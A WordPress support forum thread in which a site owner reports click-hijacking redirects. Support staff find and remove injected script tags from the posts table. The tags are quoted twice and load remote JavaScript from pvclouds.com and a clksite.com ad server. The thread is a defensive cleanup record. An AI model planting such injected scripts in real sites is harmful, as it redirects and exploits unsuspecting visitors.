Help clean up malware

My site seems to be infected, I ran a scan and it returned the following for me to review:

/public_html/wp-admin/includes/class-pclzip.php
?…/public_html/wp-content/plugins/js_composer/assets/lib/bower/ace-builds/src-min-noconflict/worker-css.js
?…/public_html/wp-content/plugins/js_composer/assets/lib/bower/json-js/json2.min.js
?…/public_html/wp-content/plugins/js_composer/assets/lib/bower/lessjs/dist/less.min.js
?…/public_html/wp-content/plugins/js_composer/assets/lib/php.default/php.default.min.js
?…/public_html/wp-content/plugins/js_composer/include/classes/editors/class-vc-backend-editor.php
?…/public_html/wp-content/plugins/js_composer/include/classes/editors/class-vc-frontend-editor.php
?…/public_html/wp-content/plugins/revslider/admin/assets/js/edit_layers.js
?…/public_html/wp-content/plugins/revslider/admin/assets/js/edit_layers_timeline.js
?…/public_html/wp-content/plugins/revslider/includes/slider.class.php
?…/public_html/wp-content/plugins/revslider/public/assets/js/jquery.themepunch.revolution.min.js
?…/public_html/wp-content/plugins/revslider/public/assets/js/extensions/revolution.extension.actions.min.js
?…/public_html/wp-content/themes/gastrobar/assets/js/modules/plugins/jquery.plugin.js
?…/public_html/wp-includes/js/json2.js
?…/public_html/wp-includes/js/json2.min.js
?…/public_html/wp-includes/js/tw-sack.js
?…/public_html/wp-includes/js/tw-sack.min.js
?…/public_html/wp-includes/js/jquery/jquery.form.min.js
?…/public_html/wp-includes/js/jquery/jquery.schedule.js
?…/public_html/wp-includes/js/tinymce/tiny_mce_popup.js

I have updated the WP Bakery PageBuilder and PHP to latest version but the issue is still there. This seems to be related to the Revolution Slider plugin.

The whole page is linked to some random site. When anyone click anywhere on the page like slider navigation or social links it redirects to those links.

  • Nithin Ramdas
    • Support Wizard

    Hi Lee ,

    On further troubleshooting the malware was affected in the database side, there were many instances of the following scripts in wp_posts table, for example:

    
    <script type='text/javascript' src='//pl15180773.pvclouds.com/2b/e2/3d/2be23d024eff3a5446e06744968768be.js'></script><script data-cfasync='false' type='text/javascript' src='//p79479.clksite.com/adServe/banners?tid=79479_127480_7&tagid=2'></script>
    

    I have removed all the occurrence of these in the DB side, and now the website should be good. Please make sure to run any pending updates to plugins, and theme to ensure such issues doesn’t crop up again.

    [attachments are only viewable by logged-in members]

    Please do check, and let us know if you have any further query.

    Regards,
    Nithin

  • Lee
    • Site Builder, Child of Zeus

    Hi. Nithin

    we have now experience the same issue as above which has seemed to come back- I have tried a file and DB restore back to the date you kindly assisted with not luck, could you review again please and also advise way to combat this coming back as we have configured everything possible

  • Kris Tomczyk
    • Ex Staff

    Hi Lee

    I review last ticket data and I see that /wp-admin url does not work.

    Also when I log in to control panel I cannot access database in phpmyadmin.

    Please send below data once again and full instruction how to access your database, because right now it gives error:
    mysqli_real_connect(): (HY000/2002):

    Please send it through our secure contact form here https://wpmudev.com/contact/#i-have-a-different-question and make sure that subject is “I have a different question” and:
    – Mark to my attention: ATTN: Kris

    – Site access:
    — correct login url
    — username
    — password

    – access to phpmyadmin guide
    — host
    — username
    — password
    — port

    – Link back to this thread

    Please don’t share any sensitive information (i.e credentials) in the Support Forum, it has public visibility and everyone will have access to it.

    Please confirm here in the thread that you have sent that message.

    Kind Regards,
    Kris

  • Kris Tomczyk
    • Ex Staff

    Hi Lee

    I remove this code from database:
    <script type=\'text/javascript\' src=\'//pl15180773.pvclouds.com/2b/e2/3d/2be23d024eff3a5446e06744968768be.js\'></script><script data-cfasync=\'false\' type=\'text/javascript\' src=\'//p79479.clksite.com/adServe/banners?tid=79479_127480_7&tagid=2\'></script>
    It exist in 642 places.

    I also run a new Defender scan and if give nothing.

    I recommend those steps:
    1. upgrade plugins and WP CORE
    1. upgrade your theme because because it is outdated
    2. backup after all updates
    3. reset passwords for wp/ftp/host panel/
    4. scan pc for malware
    5.consider to change hosting

    Kind Regards,
    Kris